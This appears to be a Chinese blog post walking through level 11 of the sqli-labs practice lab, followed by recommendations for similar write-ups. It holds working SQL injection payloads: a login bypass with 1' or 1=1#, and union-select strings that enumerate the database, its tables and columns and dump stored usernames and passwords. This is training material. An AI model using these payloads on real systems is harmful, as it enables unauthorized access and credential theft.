sqli-labs-----第11关

已于 2022-11-09 16:51:15 修改
阅读量1.6k 收藏 2
点赞数 3
分类专栏: sqli-labs 文章标签: sql 数据库
于 2022-11-09 16:20:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyzhxhn/article/details/127771611
版权

进入页面有一个登录窗口。第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中。

 

随便在登录框中输入值,用burp suite抓包

 

发现是POST请求

尝试利用sql注入

判断注入类型

可以判断出是单引号字符型注入

由报错信息可知,--+没有发挥作用,尝试用其他注释符:#

没有报错,可以判断#是有用的

尝试使用万能登录  1' or 1=1#

登陆成功!!!!!!

打开index.php

查看sql语句

SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1

输入1' or 1=1#

SELECT username, password FROM users WHERE username='1' or 1=1

因为1=1为永真式,与前面的or结合,where后语句直接为真。变为

SELECT username, password FROM users

利用sql注入拿到数据库信息

判断所在数据库中表的字段数

输入username=1' or '1'='1  password=1' order by 3#

 username=1' or '1'='1  password=1' order by 2#

 可以判断出字段数为2

uname=1' or '1'='1&passwd=1' union select 1,2#&submit=Submit

判断显示位置

 uname=1' or '1'='1&passwd=1' union select database(),user()#&submit=Submit

uname=1' or '1'='1&passwd=1' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),2#&submit=Submit

 

uname=1' or '1'='1&passwd=1'union select (select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),2#&submit=Submit

uname=1' or '1'='1&passwd=1'union select group_concat(username),group_concat(password) from security.users#&submit=Submit

 得到数据!!!!

Blchain
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
sql报错型注入-sqli-labs第11
weixin_46784800的博客
11-03 517
获取数据的操作 判断是否为字符型注入 passwd=1' or '1'='1 &uname=1' or '1'='1 输入post参数判断是否为字符型注入 判断数据库中含有多少列 通过查询语句: uname=1'or 1=1 order by 3 -- -&passwd=1' or 1=1 -- - 可发现报错:Unknown column ‘3’ in ‘order clause’,则可说明查询的数据库中只有两列,则可确定后续的联合查询的参数数量。 判断界面输出与数据库的接口
Sqli-labs靶场第11详解[Sqli-labs-less-11]
最新发布
m0_73615178的博客
02-24 953
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-lab操作详解
07-12
sqli-lab操作详解
安装sqli-labs
10-22
安装sqli-labs
sqli-labs 第十一
weixin_67813445的博客
02-16 259
11出现登录框,发现是基于post进行的注入,我们可以用burrp suit来进行抓包,也可以选用hackbar的post方式
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1342
sqli-labs基础篇 第11~17
sqli-labs第11-20
永远相信美好的事情即将发生
12-15 3767
Less-11 进入后是个登录页面,应该是基于post的注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
sqli-labs靶场】第11
qq_61019688的博客
04-26 703
知道了sql语句,接下来就是构造sql语句来进行查询,例如1’ or 1=1#(注意此处不能再使用and来构造恒真语句,因为我们不知道username和password,所以要想判断sql语句是否执行要使用or,这样or后面的语句为true则执行,为false则报错)(还有一个注意点的此处不能再用--+来注释,要使用#)1’ order by 2#,无返回内容,由此可以判断出列数应该是2,对于为啥order by 2无内容返回因为是可能不存在username=1,所以查不到内容。1’ or 1=2#报错。
sqli-labs11(基于post提交的单引号闭合的字符型注入)通思路
zyh1588的博客
11-06 394
小白回顾sqli-labs靶场第十一
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs:Less 11~20 通详解
qq_45756971的博客
10-27 539
第十一: 看到登录框,先使用弱口令进行尝试,登录成功 输入单引号尝试引起报错 猜测后台语句为: select * from where username=‘username’ and password=’$password’ 接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出 判断列数 成功查找到信息 第十二 输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句 这里根据报错信息,使用双引号加括号闭合 第十三 通过报错信息可以构造如下的闭合方式 这一
Sqli-Labs(第11~第42)通笔记
weixin_54894046的博客
11-16 1023
sql注入lesson-11~31
基于Sql-Labs靶场的SQL注入-11~16
Joker
12-31 691
这里我讲述了POST提交方式的注入方法,用到的注入类型为联合注入、报错注入、布尔盲注三种。
sqli-labs11-22心得与思路
m0_48294281的博客
03-28 3952
sqli-labs11-22心得与思路
sqli-labs闯
10-09
很高兴为您解答sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯:访问您的本地服务器,并根据提示依次完成每个卡。每个卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值